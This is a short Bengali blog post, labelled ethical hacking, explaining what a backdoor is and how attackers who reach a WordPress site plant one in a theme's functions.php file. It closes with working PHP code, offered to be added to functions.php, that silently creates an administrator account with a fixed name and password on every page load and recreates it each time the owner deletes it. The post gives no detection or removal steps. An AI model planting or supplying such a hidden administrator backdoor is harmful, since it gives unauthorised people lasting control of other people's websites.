Ethical hacking, wordpress

ব্যাকডোর কি? কিভাবে ওয়ার্ডপ্রেস ওয়েবসাইটে ব্যাকডোর এর মাধ্যমে হ্যাকাররা ড্যাশবোর্ডে অনুপ্রবেশ করে?

September 3, 2022

ব্যাকডোর কি?

ব্যাকডোর ব্যবহার করে হ্যাকাররা কোনো সিস্টেমে অনুপ্রবেশ করে। সহজ কথায়, ব্যাকডোর হলো এমন এক অসংরক্ষিত রাস্তা বা পথ যার মাধ্যমে কেউ কোনো সংরক্ষিত সিস্টেমে ঢুকে পড়ে। এটা হতে পারে কোনো দূর্বল পাসওয়ার্ড, configuration ভুল ইত্যাদি। কোনো সিস্টেমের দূর্বল অথেনটিকেশন ব্যবস্থাও ব্যাকডোরের পর্যায়ে পড়ে। ব্যাকডোর বিভিন্ন ওয়েবসাইটেও add করা যায় এবং ওয়েব সাইটের এডমিন এর অজান্তেই যে কেউ নতুন একটি ইউজার ক্রিয়েট করে যে কোন ওয়েব সাইটের এডমিন প্যানেলে ঢুকতে পারে।

কিভাবে ওয়ার্ডপ্রেস ওয়েবসাইটে ব্যাকডোর এর মাধ্যমে হ্যাকাররা ড্যাশবোর্ডে অনুপ্রবেশ করে?

ওয়ার্ডপ্রেস ওয়েব সাইটে ব্যাকডোর অনেক ধরনের হয়। ব্যাকডোর গুলো সাধারণত বিভিন্ন ওয়ার্ডপ্রেস থিম গুলোর functions.php ফাইলে এড করে দেওয়া হয়। বিভিন্ন প্লাগিন এবং থিম এর ভাড়া বৃদ্ধির মাধ্যমে কোনভাবে যদি হ্যাকাররা ওয়ার্ডপ্রেসের এক্সেস পায় তাহলে তারা function.php ফাইল ব্যাকডোর Push করে।

এবং পরবর্তীতে এই backdoor থাকা ইউজার আইডি এবং পাসওয়ার্ড অটোমেটিক্যালি জেনারেট হয়ে যায়। এবং হ্যাকাররা ওয়ার্ডপ্রেস ওয়েব সাইটের ড্যাশবোর্ডে এক্সেস নিয়ে নেয়। এমনকি ওয়ার্ডপ্রেস ওয়েব সাইটের মালিক যতবার ইউজার আইডি এবং পাসওয়ার্ড টি ডিলিট করে দিবে ততোবারই এই ব্যাকডোর এর মাধ্যমে ইউজার তৈরি হতে থাকবে। অর্থাৎ এই Backdoor ডিটেক্ট করে রিমুভ না করা পর্যন্ত ইউজার তৈরি হতে থাকবে এবং হ্যাকার সিস্টেমের এক্সেস পেয়ে যাবে।

ব্যাকডোর-01 (add to theme functions.php)

function wpb_admin_account(){
$user = ‘minhaz’;
$pass = ‘pass’;
$email = ’email@email.em’;
if ( !username_exists( $user ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $user, $pass, $email );
$user = new WP_User( $user_id );
$user->set_role( ‘administrator’ );
}
}
add_action(‘init’,’wpb_admin_account’);